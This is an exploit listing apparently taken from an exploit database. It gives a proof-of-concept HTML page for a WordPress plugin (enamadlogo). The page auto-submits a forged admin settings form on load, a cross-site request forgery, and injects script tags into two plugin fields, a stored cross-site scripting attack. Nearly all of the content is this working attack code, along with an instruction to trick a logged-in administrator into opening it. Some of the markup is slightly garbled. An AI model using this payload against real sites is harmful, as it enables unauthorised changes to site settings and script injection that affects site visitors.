Share
## https://sploitus.com/exploit?id=WPEX-ID:B54B55E0-B184-4C90-BA94-FEDA0997BF2A
Make a logged in admin open an HTML file containing:
```
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/options-general.php?page=enamadlogo-options" method="POST">
<input type="hidden" name="enamad-enable" value="1">
<input type="hidden" name="enamad-width" value="125">
<input type="hidden" name="enamad-position" value="bottom-left">
<input type="hidden" name="enamad-view-method" value="front-page">
<input type="hidden" name="enamad-code" value="1">
<input type="hidden" name="enamad-shamed-code" value="</textarea><script>alert(/XSS: enamad-code/)</script>">
<input type="hidden" name="enamad-custom-code" value="</textarea><script>alert(/XSS: enamad-custom-code/)</script>">
<input type=hidden" name="enamad-submit" value="ุซุจุช">
<input type="submit" value="submit">
</form>
</body>
```